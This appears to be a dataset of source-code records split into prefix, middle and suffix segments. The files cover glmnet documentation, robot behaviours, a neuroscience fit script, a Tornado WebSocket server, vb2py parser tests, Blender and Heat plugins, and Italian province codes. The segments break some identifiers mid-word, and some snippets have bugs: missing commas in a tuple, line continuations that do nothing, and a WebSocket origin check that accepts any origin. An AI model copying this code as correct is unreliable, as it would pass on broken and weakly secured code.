cvlo lower curve = cvm-cvsd.
nzero number of non-zero coefficients at each lambda.
name a text string indicating type of measure (for plotting
purposes).
glmnet_fit a fitted glmnet object for the full data.
lambda_min value of lambda that gives minimum cvm.
lambda_1se largest value of lambda such that error is within 1 standard
error of the minimum.
class Type of regression - internal usage.
fit_preval if keep=true, this is the array of prevalidated fits. Some
entries can be NA, if that and subsequent values of lambda
are not reached for that fold.
foldid if keep=true, the fold assignments used.
DETAILS:
The function runs glmnet nfolds+1 times; the first to get the lambda
sequence, and then the remainder to compute the fit with each of the
folds omitted. The error is accumulated, and the average error and
standard deviation over the folds is computed. Note that cvglmnet
does NOT search for values for alpha. A specific value should be
supplied, else alpha=1 is assumed by default. If users would like to
cross-validate alpha as well, they should call cvglmnet with a
pre-computed vector foldid, and then use this same fold vector in
separate calls to cvglmnet with different values of alpha.
LICENSE: GPL-2
AUTHORS:
Algorithm was designed by Jerome Friedman, Trevor Hastie a
|
nd Rob Tibshirani
Fortran code was written by Jerome Friedman
R wrapper (from which the MATLAB wrapper was adapted) was written by Trevor Hasite
The original MATLAB wrapper was written by Hui Jiang,
and is updated and maintained by Junyang Qian.
This Python wrapper (adapted from the Matlab and R wrappers) is written by Balakumar B.J.,
Department of Statistics, Stanford University, Stanford, California, USA.
REF
|
ERENCES:
Friedman, J., Hastie, T. and Tibshirani, R. (2008) Regularization Paths for Generalized Linear Models via Coordinate Descent,
http://www.jstatsoft.org/v33/i01/
Journal of Statistical Software, Vol. 33(1), 1-22 Feb 2010
Simon, N., Friedman, J., Hastie, T., Tibshirani, R. (2011) Regularization Paths for Cox's Proportional Hazards Model via Coordinate Descent,
http://www.jstatsoft.org/v39/i05/
Journal of Statistical Software, Vol. 39(5) 1-13
Tibshirani, Robert., Bien, J., Friedman, J.,Hastie, T.,Simon, N.,Taylor, J. and Tibshirani, Ryan. (2010) Strong Rules for Discarding Predictors in Lasso-type Problems,
http://www-stat.stanford.edu/~tibs/ftp/strong.pdf
Stanford Statistics Technical Report
SEE ALSO:
cvglmnetPlot, cvglmnetCoef, cvglmnetPredict, and glmnet.
EXAMPLES:
# Gaussian
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100, 1)
cvfit = cvglmnet(x = x, y = y)
cvglmnetPlot(cvfit)
print( cvglmnetCoef(cvfit) )
print( cvglmnetPredict(cvfit, x[0:5, :], 'lambda_min') )
cvfit1 = cvglmnet(x = x, y = y, ptype = 'mae')
cvglmnetPlot(cvfit1)
# Binomial
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,1)
y = (y > 0.5)*1.0
fit = cvglmnet(x = x, y = y, family = 'binomial', ptype = 'class')
cvglmnetPlot(fit)
# poisson
x = scipy.random.rand(100,10)
y = scipy.random.poisson(size = [100, 1])*1.0
cvfit = cvglmnet(x = x, y = y, family = 'poisson')
cvglmnetPlot(cvfit)
# Multivariate Gaussian:
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,3)
cvfit = cvglmnet(x = x, y = y, family = 'mgaussian')
cvglmnetPlot(cvfit)
# Multinomial
x = scipy.random.rand(100,10)
y = scipy.random.rand(100,1)
y[y < 0.3] = 1.0
y[y < 0.6] = 2.0
y[y < 1.0] = 3.0
cvfit = cvglmnet(x = x, y = y, family = 'multinomial')
cvglmnetPlot(cvfit)
#cox
Not implemented for cvglmnet.py
% Cox
n=1000;p=30;
nzc=p/3;
x=randn(n,p);
beta=randn(nzc,1);
fx=x(:,1:nzc)*beta/3;
hx=exp(fx);
ty=exprnd(1./hx,n,1);
tcens=binornd(1,0.3,n,1);
y=cat(2,ty,1-tcens);
foldid=randsample(10,n,true);
fit1_cv=cvglmnet(x,y,'cox',[],[],[],foldid);
cvglmnetPlot(fit1_cv);
% Parallel
|
WalkingMachine/sara_behaviors
|
sara_flexbe_behaviors/src/sara_flexbe_behaviors/init_sequence_sm.py
|
Python
|
bsd-3-clause
| 2,331
| 0.023595
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_cor
|
e import Behavior, Autono
|
my, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sara_flexbe_states.sara_set_head_angle import SaraSetHeadAngle
from sara_flexbe_states.run_trajectory import RunTrajectory
from sara_flexbe_states.set_gripper_state import SetGripperState
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Thu Jul 27 2017
@author: Redouane Laref Nicolas Nadeau
'''
class Init_SequenceSM(Behavior):
'''
Initialisation Sequence
'''
def __init__(self):
super(Init_SequenceSM, self).__init__()
self.name = 'Init_Sequence'
# parameters of this behavior
# references to used behaviors
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
def create(self):
# x:976 y:64, x:973 y:289
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:42 y:72
OperatableStateMachine.add('INIT HEAD',
SaraSetHeadAngle(pitch=0.4, yaw=0),
transitions={'done': 'repos'},
autonomy={'done': Autonomy.Off})
# x:205 y:72
OperatableStateMachine.add('repos',
RunTrajectory(file="repos", duration=0),
transitions={'done': 'opengrip'},
autonomy={'done': Autonomy.Off})
# x:506 y:86
OperatableStateMachine.add('opengrip',
SetGripperState(width=0.1, effort=0),
transitions={'object': 'finished', 'no_object': 'finished'},
autonomy={'object': Autonomy.Off, 'no_object': Autonomy.Off},
remapping={'object_size': 'object_size'})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
|
h-mayorquin/g_node_data_analysis_205
|
1_day/fit_data.py
|
Python
|
bsd-2-clause
| 1,957
| 0.001533
|
import numpy as np
import matplotlib.pyplot as plt
from math import exp
size = 9
dt = 50.0 # ms
dt_2 = 550.0
# Vectors to fit
x_fit = np.zeros(size)
V_max_fit = np.zeros(size)
V0_fit = np.zeros(size)
# Paramters of the model
tau_rec = 1000.0 # ms
tau_mem = 32.0 # ms
tau_in = 1.8 # ms
A = 144.0
u = 0.26
# First we will fit x
x_fit[0] = 1
for i in range(size - 2):
x_fit[i+1] = x_fit[i] * (1 - u) * exp(-dt / tau_rec)
+ 1 - exp(-dt / tau_rec)
# Last value of x_fit
x_fit[-1] = x_fit[-2] * (1 - u) * exp(-dt_2 / tau_rec)
+ 1 - exp(-dt_2 / tau_rec)
# We calculate alpha fit
alpha_fit = u * A * x_fit
# Now we calculate V_0 and V_max
V0_fit[0] = 0
tau_diff = tau_in - tau_mem
for k in range(size - 1):
ex1 = exp(-dt / tau_in)
ex2 = exp(-dt / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
print 'problem', problem
this = alpha_fit[k] * tau_in / tau_diff
print 'this', this
that = V0_fit[k] * exp(-dt / tau_mem)
print 'that', that
V0_fit[k + 1] = that + this * problem
for k in range(size - 1):
aux2 = (alpha_fit[k] * tau_in - V0_fit[k] * tau_diff)
#print 'aux', aux2
aux = alpha_fit[i] * tau_mem / aux2
V_max_fit[k] = alpha_fit[k] * (aux ** (tau_mem / tau_diff))
# The final values
ex1 = np.exp(-dt_2 / tau_in)
ex2 = np.exp(-dt_2 / tau_mem)
print 'e
|
x1 ex2', ex1, ex2
problem = ex1 - ex2
problem = ex1 - ex2
this = alpha_fit[-2] * tau_in / tau_diff
that = V0_fit[-2] * exp(-dt_2 / tau_mem)
V0_fit[-1] = that + this * problem
aux = alpha_fit[-1] * tau_mem / (alpha_fit[-1]
* tau_in - V0_fit[-1] * tau_diff)
V_max_fit[-1] = alpha_fit[-1] * (aux ** (tau_mem / tau_diff))
amp_fit = V_max_fit - V0_fit
# Finally we plot
plt.subplot(1, 2, 1)
plt.plot(x_fit, '*-', label='x_fit')
plt.legend()
plt.subplot
|
(1, 2, 2)
plt.plot(V_max_fit, '*-', label='Vmax_fit')
plt.hold(True)
plt.plot(V0_fit, '*-', label='V0_fit')
plt.legend()
plt.show()
|
mrozekma/Sprint
|
WebSocket.py
|
Python
|
mit
| 3,192
| 0.030075
|
try:
from tornado.websocket import WebSocketHandler
import tornado.ioloop
tornadoAvailable = True
except ImportError:
class WebSocketHandler(object): pass
tornadoAvailable = False
from json import loads as fromJS, dumps as toJS
from threading import Thread
from Log import console
import Settings
from utils import *
PORT = Settings.PORT + 1
handlers = []
channels = {}
class WebSocket:
@staticmethod
def available():
return tornadoAvailable
@staticmethod
def start():
if WebSocket.available():
WSThread().start()
@staticmethod
def broadcast(data):
for handler in handlers:
handler.write_message(toJS(data))
@staticmethod
def sendChannel(channel, data):
if not 'channel' in data:
data['channel'] = channel
for handler in channels.get(channel, []):
handler.write_message(toJS(data))
class WSThread(Thread):
def __init__(self):
Thread.__init__(self)
self.name = 'websocket'
self.daemon = True
def run(self):
app = tornado.web.Application([('/', WSHandler)])
app.listen(PORT, '0.0.0.0')
tornado.ioloop.IOLoop.instance().start()
class WSHandler(WebSocketHandler):
def __init__(self, *args, **kw):
super(WSHandler, self).__init__(*args, **kw)
self.channels = set()
def check_origin(self, origin):
return True
def open(self):
handlers.append(self)
console('websocket', "Opened")
def on_message(self, message):
console('websocket', "Message received: %s" % message)
try:
data = fromJS(message)
except:
return
if 'subscribe' in data and isinstance(data['subscribe'], list):
addChannels = (set(data['subscribe']) - self.channels)
self.channels |= addChannels
for channel in addChannels:
if channel not in channels:
channels[channel] = set()
channels[channel].add(self)
if 'unsubscribe' in data and isinstance(data['unsubscribe'], list):
rmChannels = (self.channels & set(data['unsubscribe']))
self.channels -= rmChannels
for channel in rmChannels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
def on_close(self):
for channel in self.channels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
handlers.remove(self)
console('websocket', "Closed")
verbs = {
'status': "Status set",
'name': "Renamed",
'goal': "Goal set",
'assigned': "Reassigned",
'hours': "Hours updated",
}
from Event import EventHandler, addEventHandler
class ShareTaskChanges(EventHandler):
def newTask(self, handler, task):
WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'new'}); #TODO
def taskUpdate(self, handler, task, field, value):
if field == 'assigned': # Convert set of Users to list of usernames
value = [user.username for user in value]
elif field == 'goal': # Convert Goal to goal ID
value = value.id if
|
value else 0
description = ("%s by %s" % (verbs[field], task.creator)) if field in verbs else None
WebSocket.sendChannel("backlog#%d" % task.spri
|
nt.id, {'type': 'update', 'id': task.id, 'revision': task.revision, 'field': field, 'value': value, 'description': description, 'creator': task.creator.username})
addEventHandler(ShareTaskChanges())
|
reingart/vb2py
|
vb2py/test/testparser.py
|
Python
|
gpl-3.0
| 41,055
| 0.003898
|
#
# Turn off logging in extensions (too loud!)
import vb2py.extensions
vb2py.extensions.disableLogging()
from vb2py.vbparser import buildParseTree, VBParserError
#
# Set some config options which are appropriate for testing
import vb2py.config
Config = vb2py.config.VB2PYConfig()
Config.setLocalOveride("General", "ReportPartialConversion", "No")
tests = []
# << Parsing tests >> (1 of 61)
# Simple assignments
tests.append("""
a = 10
b = 20+30
c = "hello there"
oneVal = 10
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# Set type assignments
tests.append("""
Set a = myobject
Set b = myobject.subobject
Set obj = function(10, 20, 30+40)
""")
# Set type assignments with "New" objects
tests.append("""
Set a = New myobject
Set b = New myobject.subobject
""")
# Assignments with tough parenthesis
tests.extend([
"d=(((4*5)/2+10)-10)",
])
# Assignments with tough string quotes
tests.extend([
'd="g""h""j"""',
])
# Assignments with tough strings in general
tests.extend([
r'a="\"', # The single slash is a killer
])
# << Parsing tests >> (2 of 61)
# Simple expressions
tests.extend([
'a = 10',
'a = 20+30',
'a = "hello there"',
'a = 10',
'a = Array(10,20)',
'a = myfunction.mymethod(10)',
'a = &HFF',
'a = &HFF&',
'a = #1/10/2000#',
'a = #1/10#',
'a = 10 Mod 2',
])
# Nested expressions
tests.extend(["a = 10+(10+(20+(30+40)))",
"a = (10+20)+(30+40)"
|
,
"a = ((10+20)+(30+40))",
])
# Conditional expressions
tests.extend(["a = a = 1",
"a = a <> 10",
"a = a > 10",
"a = a < 10",
"a = a <= 10",
"a = a >= 10",
"a = a = 1 And b = 2",
"a = a = 1 Or b = 2",
"a = a Or b",
"a = a
|
Or Not b",
"a = Not a = 1",
"a = Not a",
"a = a Xor b",
"a = b Is Nothing",
"a = b \ 2",
"a = b Like c",
'a = "hello" Like "goodbye"',
])
# Things that failed
tests.extend([
"a = -(x*x)",
"a = -x*10",
"a = 10 Mod 6",
"Set NewEnum = mCol.[_NewEnum]",
"a = 10 ^ -bob",
])
# Functions
tests.extend([
"a = myfunction",
"a = myfunction()",
"a = myfunction(1,2,3,4)",
"a = myfunction(1,2,3,z:=4)",
"a = myfunction(x:=1,y:=2,z:=4)",
"a = myfunction(b(10))",
"a = myfunction(b _\n(10))",
])
# String Functions
tests.extend([
'a = Trim$("hello")',
'a = Left$("hello", 4)',
])
# Things that failed
tests.extend([
"a = -(x*x)",
"a = -x*10",
"a = 10 Mod 6",
])
# Address of
tests.extend([
"a = fn(AddressOf fn)",
"a = fn(a, b, c, AddressOf fn)",
"a = fn(a, AddressOf b, AddressOf c, AddressOf fn)",
"a = fn(a, AddressOf b.m.m, AddressOf c.k.l, AddressOf fn)",
])
# Type of
tests.extend([
"a = fn(TypeOf fn)",
"a = fn(a, b, c, TypeOf fn)",
"a = fn(a, TypeOf b, TypeOf c, TypeOf fn)",
"a = fn(a, TypeOf b.m.m, TypeOf c.k.l, TypeOf fn)",
"a = TypeOf Control Is This",
"a = TypeOf Control Is This Or TypeOf Control Is That",])
# << Parsing tests >> (3 of 61)
# Using ByVal and ByRef in a call or expression
tests.extend([
'a = fn(ByVal b)',
'a = fn(x, y, z, ByVal b)',
'a = fn(x, y, z, ByVal b, 10, 20, 30)',
'a = fn(ByVal a, ByVal b, ByVal c)',
'a = fn(ByRef b)',
'a = fn(x, y, z, ByRef b)',
'a = fn(x, y, z, ByRef b, 10, 20, 30)',
'a = fn(ByRef a, ByRef b, ByRef c)',
'fn ByVal b',
'fn x, y, z, ByVal b',
'fn x, y, z, ByVal b, 10, 20, 30',
'fn ByVal a, ByVal b, ByVal c',
'fn ByRef b',
'fn x, y, z, ByRef b',
'fn x, y, z, ByRef b, 10, 20, 30',
'fn ByRef a, ByRef b, ByRef c',
])
# << Parsing tests >> (4 of 61)
# One line comments
tests.append("""
a = 10
' b = 20+30
' c = "hello there"
' oneVal = 10
twoVals = Array(10,20)
' functioncall = myfunction.mymethod(10)
""")
# One line comments with Rem
tests.append("""
a = 10
Rem b = 20+30
Rem not needed c = "hello there"
Rem opps oneVal = 10
twoVals = Array(10,20)
Rem dont do this anymore functioncall = myfunction.mymethod(10)
""")
# In-line comments
tests.append("""
a = 10
b = 20+30 ' comment
c = "hello there" ' another comment
oneVal = 10 ' yet another comment
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# In-line comments with Rem
tests.append("""
a = 10
b = 20+30 Rem comment
c = "hello there" Rem another comment
oneVal = 10 Rem yet another comment
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# Things which aren't comments
tests.append("""
a = "hello, this might ' look like ' a comment ' "
b = "wow there are a lot of '''''''' these here"
""")
# tough inline comments
tests.extend([
"Public a As Integer ' and a comment"
])
# comments in awkward places
tests.extend([
"""
If a =0 Then ' nasty comment
b=1
End If ' other nasty comment
""",
"""
While a<0 ' nasty comment
b=1
Wend ' other nasty comment
""",
"""
Select Case a ' nasty comment
Case 10 ' oops
b=1
Case Else ' other nasty comment
b = 2
End Select ' gotcha
""",
"""
For i = 0 To 100 ' nasty comment
b=1
Next i ' other nasty comment
""",
"""
Sub a() ' nasty comment
b=1
End Sub ' other nasty comment
""",
"""
Function f() ' nasty comment
b=1
End Function ' other nasty comment
""",
])
# << Parsing tests >> (5 of 61)
# Directives
tests.extend([
"' VB2PY-Set General.Blah = Yes",
"' VB2PY-Set General.Blah = ___",
"' VB2PY-Unset General.Blah",
"' VB2PY-Add: General.Option = 10",
])
# << Parsing tests >> (6 of 61)
# Two line continuations
tests.append("""
a = _
10 + 20 + 30
b = 10/ _
25
c = (one + _
two + three)
""")
# Milti-line continuations
tests.append("""
a = _
10 + 20 + 30 _
* 10/ _
25
c = (one + _
two + three) * _
four.five()
""")
tests.extend(["""
Private Declare Function GetTempPathA Lib "kernel32" _
(ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
""",
"""
Function GetTempPathA _
(ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
End Function
""",
])
# << Parsing tests >> (7 of 61)
# Simple dims
tests.extend([
"Dim A",
"Dim B As String",
"Dim variable As Object.OtherObj",
"Dim Var As Variant",
"Dim A As String * 100",
])
# Dims with New
tests.extend([
"Dim A As New Object",
"Dim B As New Collection",
])
# Multiple dims on one line
tests.extend([
"Dim A, B, C, D, E, F",
"Dim B As String, B As Long, B As Integer, B As String, B As String",
"Dim variable As Object.OtherObj, B, C, D, E",
"Dim Var As Variant",
"Dim A, B, C As New Collection",
"Dim E As New Collection, F As New Object, F, G",
"Dim H As New Object, G As New Object",
])
# Array type dims
tests.extend([
"Dim A()",
"Dim B(10, 20, 30) As String",
"Dim variable() As Object.OtherObj",
"Dim Var(mysize) As Variant",
])
# Scoped dims
tests.extend([
"Public A",
"Private B As String",
"Private A, B, C, D, E, F",
"Private B As String, B As Long, B As Integer, B As String, B As String",
"Private variable As Object.OtherObj, B, C, D, E",
"Public Var As Variant",
])
# Static dims
tests.extend([
"Static A",
"Static B As String",
"Static A, B, C, D, E, F",
"Static B As String, B As Long, B As Integer, B As String, B As String",
"Static variable As Object.OtherObj, B, C, D, E",
"Static Var As Variant",
])
# << Parsing tests >> (8 of 61)
# Arrays
tests.extend([
"Dim a(10)",
"Dim a(0)",
"Dim a(0), b(20), c(30)",
"Dim a(10+20)",
"Dim a(10+20, 1+3)",
"Dim a(1 To 10)",
"Dim a(1 To 10, 5 To 20)",
])
# Redims
tests.extend([
"ReDim a(10)",
"ReDim a(0)",
"ReDim Preserve a(20)",
"ReDim a(0), b(20), c(30)",
"ReDim Preserve a(20), b(20)",
"ReDim a(10+20)",
"ReDim a(10+20, 1+3)",
"ReDim a(1 To 10)",
"ReDim a(1 To 10, 5 To 20)",
"ReDim
|
taxpon/sverchok
|
old_nodes/matrix_in.py
|
Python
|
gpl-3.0
| 2,720
| 0.003309
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Fra
|
nklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import mathutils
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import (matrixdef, Matrix_listing, Vector_generate)
class MatrixGenNode(bpy.types.Node, SverchCustomTreeNode):
''' MatrixGenerator '''
bl_idname = 'MatrixGenNode'
bl_label = 'Matr
|
ix in'
bl_icon = 'OUTLINER_OB_EMPTY'
def sv_init(self, context):
s = self.inputs.new('VerticesSocket', "Location")
s.use_prop = True
s = self.inputs.new('VerticesSocket', "Scale")
s.use_prop = True
s.prop = (1, 1 , 1)
s = self.inputs.new('VerticesSocket', "Rotation")
s.use_prop = True
s.prop = (0, 0, 1)
self.inputs.new('StringsSocket', "Angle")
self.outputs.new('MatrixSocket', "Matrix")
def process(self):
L,S,R,A = self.inputs
Ma = self.outputs[0]
if not Ma.is_linked:
return
loc = Vector_generate(L.sv_get())
scale = Vector_generate(S.sv_get())
rot = Vector_generate(R.sv_get())
rotA, angle = [[]], [[0.0]]
# ability to add vector & vector difference instead of only rotation values
if A.is_linked:
if A.links[0].from_socket.bl_idname == 'VerticesSocket':
rotA = Vector_generate(A.sv_get())
angle = [[]]
else:
angle = A.sv_get()
rotA = [[]]
max_l = max(len(loc[0]), len(scale[0]), len(rot[0]), len(angle[0]), len(rotA[0]))
orig = []
for l in range(max_l):
M = mathutils.Matrix()
orig.append(M)
matrixes_ = matrixdef(orig, loc, scale, rot, angle, rotA)
matrixes = Matrix_listing(matrixes_)
Ma.sv_set(matrixes)
def register():
bpy.utils.register_class(MatrixGenNode)
def unregister():
bpy.utils.unregister_class(MatrixGenNode)
if __name__ == '__main__':
register()
|
PennyDreadfulMTG/Penny-Dreadful-Discord-Bot
|
logsite/views/match_view.py
|
Python
|
gpl-3.0
| 2,353
| 0.002125
|
import html
import inflect
import titlecase
from flask import url_for
from shared.pd_exception import DoesNotExistException
from .. import APP, importing
from ..data import match
from ..view import View
@APP.route('/match/<int:match_id>/')
def show_match(match_id: int) -> str:
view = Match(match.get_match(match_id))
return view.page()
# pylint: disable=no-self-use,too-many-instance-attributes
class Match(View):
def __init__(self, viewed_match: match.Match) -> None:
super().__init__()
if not viewed_match:
raise DoesNotExistException()
self.match = viewed_match
self.id = viewed_match.id
self.comment = viewed_match.comment
self.format_name = viewed_match.format_name()
self.players_string = ' vs '.join([p.name for p in viewed_match.players])
self.players_string_safe = ' vs '.join([player_link(p.name) for p in viewed_match.players])
self.module_string = ', '.join([m.name for m in viewed_match.modules])
if not viewed_match.games:
self.no_games = True
return
self.game_one = viewed_match.games[0]
self.has_game_two = False
self.has_game_three = False
if len(viewed_match.games) > 1:
self.has_game_two = True
self.game_two = viewed_match.games[1]
if len(viewed_match.games) > 2:
self.has_game_three = True
se
|
lf.game_three = viewed_match.games[2]
if viewed_match.has_unexpected_third_game is None:
importing.reimport(viewed_match)
self.has_unexpected_third_game = viewed_match.has_unexpected_third_game
if viewed_match.is_tournament is None:
importing.reimport(viewed_match)
self.is_tournament = viewed_match.is_tournament
def og_title(self) -> str:
r
|
eturn self.players_string
def og_url(self) -> str:
return url_for('show_match', match_id=self.id, _external=True)
def og_description(self) -> str:
p = inflect.engine()
fmt = titlecase.titlecase(p.a(self.format_name))
description = '{fmt} match.'.format(fmt=fmt)
return description
def player_link(name: str) -> str:
url = url_for('show_person', person=name)
return '<a href="{url}">{name}</a>'.format(url=html.escape(url), name=html.escape(name))
|
jonaustin/advisoryscan
|
django/django/contrib/localflavor/it/it_province.py
|
Python
|
mit
| 2,747
| 0.001458
|
# -*- coding: utf-8 -*
PROVINCE_CHOICES = (
('AG', 'Agrigento'),
('AL', 'Alessandria'),
('AN', 'Ancona'),
('AO', 'Aosta'),
('AR', 'Arezzo'),
('AP', 'Ascoli Piceno'),
('AT', 'Asti'),
('AV', 'Avellino'),
('BA', 'Bari'),
# ('BT', 'Barletta-Andria-Trani'), # active starting from 2009
('BL', 'Belluno'),
('BN', 'Benevento'),
('BG', 'Bergamo'),
('BI', 'Biella'),
('BO', 'Bologna'),
('BZ', 'Bolzano/Bozen'),
('BS', 'Brescia'),
('BR', 'Brindisi'),
('CA', 'Cagliari'),
('CL', 'Caltanissetta'),
('CB', 'Campobasso'),
('CI', 'Carbonia-Iglesias'),
('CE', 'Caserta'),
('CT', 'Catania'),
('CZ', 'Catanzaro'),
('CH', 'Chieti'),
('CO', 'Como'),
('CS', 'Cosenza'),
('CR', 'Cremona'),
('KR', 'Crotone'),
('CN', 'Cuneo'),
('EN', 'Enna'),
# ('FM', 'Fermo'), # active starting from 2009
('FE', 'Ferrara'),
('FI', 'Firenze'),
('FG', 'Foggia'),
('FC', 'Forlì-Cesena'),
('FR', 'Frosinone'),
('GE', 'Genova'),
('GO', 'Gorizia'),
('GR', 'Grosseto'),
('IM', 'Imperia'),
('IS', 'Isernia'),
('SP', 'La Spezia'),
('AQ', u'L’Acquila'),
('LT', 'Latina'),
('LE', 'Lecce'),
('LC', 'Lecco'),
('LI', 'Livorno'),
('LO', 'Lodi'),
('LU', 'Lucca'),
('MC', 'Macerata'),
('MN', 'Mantova'),
('MS', 'Massa-Carrara'),
('MT', 'Matera'),
('VS', 'Medio Campidano'),
('ME', 'Messina'),
('MI', 'Milano'),
('MO', 'Modena'),
# ('MB', 'Monza e Brianza'), # active starting from 2009
('NA', 'Napoli'),
('NO', 'Novara'),
('NU', 'Nuoro'),
('OG', 'Ogliastra'),
('OT', 'Olbia-Tempio'),
('OR', 'Oristano'),
('PD', 'Padova'),
('PA', 'Palermo'),
('PR', 'Parma'),
('PV', 'Pavia'),
('PG', 'Perugia'),
('PU', 'Pesaro e Urbino'),
('PE', 'Pescara'),
('PC', 'Piacenza'),
('PI', 'Pisa'),
('PT', 'Pistoia'),
('PN', 'Pordenone'),
('PZ', 'Potenza'),
('PO', 'Prato'),
('RG', 'Ragusa'),
('RA', 'Ravenna'),
('RC', 'Reggio Calabria'),
('RE', 'Reggio Emilia'),
('RI', 'Rieti'),
('RN', 'Rimini')
('RM', 'Roma'),
('RO', 'Rovigo')
|
,
('SA', 'Salerno'),
('SS', 'Sassari'),
('SV', 'Savona'),
('SI', 'Siena'),
('SR', 'Siracusa'),
('SO', 'Sondrio'),
('TA', 'Taranto'),
('TE', 'Teramo'),
('TR', 'Terni'),
('TO', 'Torino'),
('TP', 'Trapani'),
('TN', 'Trento'),
('TV', 'Treviso'),
('TS', 'Trieste'),
('UD', 'Udine'),
('VA', 'Varese'),
('VE', 'Venezia'),
('VB', 'Verbano Cusio
|
Ossola'),
('VC', 'Vercelli'),
('VR', 'Verona'),
('VV', 'Vibo Valentia'),
('VI', 'Vicenza'),
('VT', 'Viterbo'),
)
|
openstack/heat
|
heat/engine/resources/openstack/trove/instance.py
|
Python
|
apache-2.0
| 29,344
| 0
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine import support
from heat.engine import translation
LOG = logging.getLogger(__name__)
class Instance(resource.Resource):
"""OpenStack cloud database instance resource.
Trove is Database as a Service for OpenStack. It's designed to run entirely
on OpenStack, with the goal of allowing users to quickly and easily utilize
the features of a relational or non-relational database without the burden
of handling complex administrative tasks.
"""
support_status = support.SupportStatus(version='2014.1')
TROVE_STATUS = (
ERROR, FAILED, ACTIVE,
) = (
'ERROR', 'FAILED', 'ACTIVE',
)
TROVE_STATUS_REASON = {
FAILED: _('The database instance was created, but heat failed to set '
'up the datastore. If a database instance is in the FAILED '
'state, it should be deleted and a new one should be '
'created.'),
ERROR: _('The last operation for the database instance failed due to '
'an error.'),
}
BAD_STATUSES = (ERROR, FAILED)
PROPERTIES = (
NAME, FLAVOR, SIZE, DATABASES, USERS, AVAILABILITY_ZONE,
RESTORE_POINT, DATASTORE_TYPE, DATASTORE_VERSION, NICS,
REPLICA_OF, REPLICA_COUNT,
) = (
'name', 'flavor', 'size', 'databases', 'users', 'availability_zone',
'restore_point', 'datastore_type', 'datastore_version', 'networks',
'replica_of', 'replica_count'
)
_DATABASE_KEYS = (
DATABASE_CHARACTER_SET, DATABASE_COLLATE, DATABASE_NAME,
) = (
'character_set', 'collate', 'name',
)
_USER_KEYS = (
USER_NAME, USER_PASSWORD, USER_HOST, USER_DATABASES,
) = (
'name', 'password', 'host', 'databases',
)
_NICS_KEYS = (
NET, PORT, V4_FIXED_IP
) = (
'network', 'port', 'fixed_ip'
)
ATTRIBUTES = (
HOSTNAME, HREF,
) = (
'hostname', 'href',
)
properties_schema = {
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of the DB instance to create.'),
update_allowed=True,
constraints=[
constraints.Length(max=255),
]
),
FLAVOR: properties.Schema(
properties.Schema.STRING,
_('Reference to a flavor for creating DB instance.'),
required=True,
update_allowed=True,
constraints=[
constraints.CustomConstraint('trove.flavor')
]
),
DATASTORE_TYPE: properties.Schema(
properties.Schema.STRING,
_("Name of registered datastore type."),
constraints=[
constraints.Length(max=255)
]
),
DATASTORE_VERSION: properties.Schema(
properties.Schema.STRING,
_("Name of the registered datastore version. "
"It must exist for provided datastore type. "
"Defaults to using single active version. "
"If several active versions exist for provided datastore type, "
"explicit value for this parameter must be specified."),
constraints=[constraints.Length(max=255)]
),
SIZE: properties.Schema(
properties.Schema.INTEGER,
_('Database volume size in GB.'),
required=True,
update_allowed=True,
constraints=[
constraints.Range(1, 150),
]
),
NICS: properties.Schema(
properties.Schema.LIST,
_("List of network interfaces to create on instance."),
default=[],
schema=properties.Schema(
properties.Schema.MAP,
schema={
NET: properties.Schema(
properties.Schema.STRING,
_('Name or UUID of the network to attach this NIC to. '
'Either %(port)s or %(net)s must be specified.') % {
'port': PORT, 'net': NET},
constraints=[
constraints.CustomConstraint('neutron.network')
]
),
PORT: properties.Schema(
properties.Schema.STRING,
_('Name or UUID of Neutron port to attach this '
'NIC to. '
'Either %(port)s or %(net)s must be specified.') % {
'port': PORT, 'net': NET},
constraints=[
constraints.CustomConstraint('neutron.port')
],
),
V4_FIXED_IP: properties.Schema(
properties.Schema.STRING,
_('Fixed IPv4 address for this NIC.'),
constraints=[
constraints.CustomConstraint('ip_addr')
]
),
},
),
),
